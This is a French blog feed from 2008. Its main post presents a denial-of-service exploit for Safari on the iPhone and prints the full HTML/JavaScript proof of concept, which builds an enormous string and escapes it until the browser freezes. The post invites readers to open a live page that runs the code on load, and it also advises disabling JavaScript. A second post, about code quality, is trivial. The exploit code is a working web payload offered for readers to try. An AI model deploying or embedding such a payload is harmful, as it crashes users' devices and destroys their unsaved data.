Debian or not to be ? 2.0 » code http://www.crashdump.fr that is the question Mon, 23 Jan 2012 13:14:39 +0000 fr hourly 1 http://wordpress.org/?v= iPhone – Exploit DoS Safari, ça commence !http://www.crashdump.fr/iphone/iphone-exploit-dos-safari-ca-commence-99/ http://www.crashdump.fr/iphone/iphone-exploit-dos-safari-ca-commence-99/#comments Wed, 23 Apr 2008 16:33:54 +0000 Crashdump http://blog.crashdump.fr/?p=99 l’iPhone est censé être une plateforme sécurisé tant les données qui peuvent être stockées sur la machine sont confidentielles – imaginez que n’importe qui puisse avoir accès a vos contact, mail ou sms. Apple a du faire de son mieux, mais rien n’est parfait. Un exploit touchant le navigateur web (Safari) a été découvert récemment, un exploit dangereux pour ce smart phone, tant au niveau sécurité que au niveau de la mauvaise publicité qui peut en découler.

Le code que je vous propose ci dessous n’est pas complet, il a été modifié depuis l’une des premières version de l’exploit pour Safari sur Mac. Il suffit de se rendre sur la page contenant le code malicieux avec votre iPhone pour qu’il le verrouille.

  • remote execution DoS vulnerability:

    • Le code que je met a votre disposition ici l’est juste a titre d’exemple (de même pour la page de test..), je ne serais donc pas responsable – quoi qu’il se passe – de ce qu’il pourrais arriver si vous ouvrez la page. Si vous voulez quand même tenter l’aventure, gardez a l’esprit que l’iPhone va complètement se verrouiller et vous perdrez donc toutes les données des applications lancées a ce moment là.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    <html>
            Copyright Georgi Guninski
            <br>
            Cannot be used in vulnerability databases
            <br>
            Especially securityfocus/mitre/cve/cert
            <script>
            var s=String.fromCharCode(257);
            var ki="";
            var me="";
            for(i=0; i<1024; i++){
                    ki=ki+s;
            }
            for(i=0; i<1024; i++){
                    me=me+ki;
            }
            var ov=s;
            for(i=0; i<28; i++) ov += ov;
            for(i=0; i<88; i++) ov += me;
            alert("done generating");
            var fuckbill=escape(ov);
            alert("done escape");
            alert(fuckbill);
            </script>
    </html>

    La vulnérabilité a été testée sur un firmware 1.1.4, mais elle est surement exploitable sur des versions antérieures (Laissez moi donc un commentaire si vous l’avez testé !).

    Malheureusement les firmwares ne sont mis a jours que très rarement sur l’iPhone et même si l’exploit a déjà été fixé sur les autres plateformes, il faudra surement attendre la « version 2″ (surement cet été) pour pouvoir en profiter ! Je vous conseille donc de désactiver le Javascript.

    Voici le lien pour télécharger le code au format texte.
    Qu’importe les risques, vous voulez tenter l’aventure ? Cliquez ici ! (Attention, le simple fait de charger la page va exécuter le code malicieux !)

    Même si la faille a été corrigée sur les dernières version de Safari disponibles au téléchargement, la version iPhone est toujours vulnérable.. on espère donc une mise a jours rapide de notre navigateur mobile préféré !

    ]]>     http://www.crashdump.fr/iphone/iphone-exploit-dos-safari-ca-commence-99/feed/ 0     Mesure de la qualitée du codehttp://www.crashdump.fr/tout-et-rien/mesure-de-la-qualitee-du-code-124/ http://www.crashdump.fr/tout-et-rien/mesure-de-la-qualitee-du-code-124/#comments Sun, 13 Apr 2008 18:49:56 +0000 Crashdump http://blog.crashdump.fr/?p=124

    ça se passe de commentaires ;)

    ]]>     http://www.crashdump.fr/tout-et-rien/mesure-de-la-qualitee-du-code-124/feed/ 1